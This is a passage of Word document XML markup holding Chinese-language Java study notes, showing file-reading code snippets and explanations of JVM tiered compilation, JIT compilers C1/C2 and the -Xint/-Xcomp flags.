        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> File file = new File ("hello.txt"); </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FileInputStream in=new FileInputStream (file); </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> File file = new File ("hello.txt"); </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FileInputStream in=new FileInputStream (file); </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InputStreamReader inReader=new InputStreamReader (in,"UTF-8"); </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>BufferedReader bufReader=new BufferedReader(inReader); </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> File file = new File ("hello.txt"); </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>FileReader fileReader=new FileReader(file); </w:t>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="001D278B">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>BufferedReader bufReader=new BufferedReader(fileReader);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00652739" w:rsidRPr="00652739" w:rsidRDefault="00652739" w:rsidP="00125738">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FEFEFE"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="180" w:afterAutospacing="0"/>
        <w:ind w:firstLine="238"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005C21C3" w:rsidRPr="00F41A4C" w:rsidRDefault="00C51695" w:rsidP="00717679">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.2</w:t>
      </w:r>
      <w:r w:rsidR="005C21C3" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00E7336C" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidR="00E7336C" w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>运维</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F6002" w:rsidRPr="00F41A4C" w:rsidRDefault="003F6002" w:rsidP="003F6002">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1.2.1  JVM</w:t>
      </w:r>
      <w:r w:rsidR="00095E9D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分层编译</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C751B" w:rsidRPr="00452B52" w:rsidRDefault="000C751B" w:rsidP="00452B52">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1.2.1.1 JVM</w:t>
      </w:r>
      <w:r w:rsidR="00D417DB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>分层编译</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00353705" w:rsidRPr="00353705" w:rsidRDefault="00353705" w:rsidP="00E924D9">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:after="240"/>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00353705">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>除了纯编译和默认的mixed之外，jvm 从jdk6u25 之后，引入了分层编译。HotSpot 内置两种编译器，分别是client启动时的c1编译器和server启动时的c2编译器，c2在将代码编译成机器代码的时候需要搜集大量的统计信息以便在编译的时候进行优化，因此编译出来的代码执行效率比较高，代价是程序启动时间比较长，而且需要执行比较长的时间，才能达到最高性能；与之相反， c1的目标是使程序尽快进入编译执行的阶段，所以在编译前需要搜集的信息比c2要少，编译速度因此提高很多，但是付出的代价是编译之后的代码执行效率比较低，但尽管如此，c1编译出来的代码在性能上比解释执行的性能已经有很大的提升，</w:t>
      </w:r>
      <w:r w:rsidRPr="008B7C2A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>所以所谓的分层编译，就是一种折中方式，在系统执行初期，执行频率比较高的代码先被c1编译器编译，以便尽快进入编译执行，然后随着时间的推移，执行频率较高的代码再被c2编译器编译，以达到最高的性能</w:t>
      </w:r>
      <w:r w:rsidRPr="00353705">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003F6002" w:rsidRDefault="00353705" w:rsidP="00DC1CE8">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00353705">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>文／worldcbf（简书作者）</w:t>
      </w:r>
      <w:r w:rsidRPr="00353705">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>原文链接：http://www.jianshu.com/p/318617435789</w:t>
      </w:r>
      <w:r w:rsidRPr="00353705">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
        <w:t>著作权归作者所有，转载请联系作者获得授权，并标注“简书作者”。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E5C6B" w:rsidRDefault="00DA54D7" w:rsidP="00DC1CE8">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId68" w:history="1">
        <w:r w:rsidR="00106435" w:rsidRPr="0076651F">
          <w:rPr>
            <w:rStyle w:val="a6"/>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://www.importnew.com/2009.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00106435" w:rsidRDefault="00ED5FA1" w:rsidP="00106435">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.2.1.2</w:t>
      </w:r>
      <w:r w:rsidR="00106435">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> JVM</w:t>
      </w:r>
      <w:r w:rsidR="00106435">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>即时编译</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0001561D" w:rsidRPr="0001561D" w:rsidRDefault="0001561D" w:rsidP="00DC1CE8">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
      <w:r w:rsidRPr="008074F5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>http://www.cnblogs.com/tianguook/archive/2013/04/13/3018641.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000637FB" w:rsidRDefault="008074F5" w:rsidP="00DC1CE8">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000637FB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">java </w:t>
      </w:r>
      <w:r w:rsidR="000637FB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="000637FB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000637FB" w:rsidRDefault="008074F5" w:rsidP="00DC1CE8">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000637FB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">java </w:t>
      </w:r>
      <w:r w:rsidR="000637FB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="000637FB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Xint </w:t>
      </w:r>
      <w:r w:rsidR="000637FB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="000637FB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
      <w:r w:rsidR="00660357">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：强制JVM运行于解释模式，编译器不介入</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000637FB" w:rsidRDefault="008074F5" w:rsidP="00DC1CE8">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="000637FB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">java </w:t>
      </w:r>
      <w:r w:rsidR="000637FB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="000637FB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Xcomp </w:t>
      </w:r>
      <w:r w:rsidR="000637FB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="000637FB">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>version</w:t>
      </w:r>
      <w:r w:rsidR="00660357">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：强制JVM运行于编译模式，但解释器会在编译无法进行的情况下介入执行过程。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000637FB" w:rsidRPr="007046F1" w:rsidRDefault="00D11DC4" w:rsidP="00DC1CE8">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0001561D" w:rsidRPr="007046F1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当虚拟机发现某个方法或代码块的运行特别频繁时，就会把这些代码认定为热点代码(Hot Spot Code)。为了提高热点代码的执行</w:t>
      </w:r>
      <w:r w:rsidRPr="007046F1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>效率，在运行时，虚拟机会把这些</w:t>
      </w:r>
      <w:r w:rsidRPr="007046F1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>代码编译成与本地平台相关的机器码，并进行各种层次的优化</w:t>
      </w:r>
      <w:r w:rsidRPr="007046F1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，完成这个任务的编译器称为</w:t>
      </w:r>
      <w:r w:rsidRPr="007046F1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>即时编译器(Just In Time Compiler)</w:t>
      </w:r>
      <w:r w:rsidRPr="007046F1">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="003651E2">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>HotSpot内置了两个即时编译器，分别称为Client Compiler（C1）和Server Compiler(C2)。</w:t>
      </w:r>
      <w:r w:rsidR="00660357">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>无论采用C1和C2编译器，解释器和编译器搭配使用的方式称为“</w:t>
      </w:r>
      <w:r w:rsidR="00660357" w:rsidRPr="0082028C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>混合模式”(Mixed Mode)</w:t>
      </w:r>
      <w:r w:rsidR="00660357">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F5E86" w:rsidRDefault="001F5E86" w:rsidP="00DC1CE8">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007046F1">
        <w:rPr>
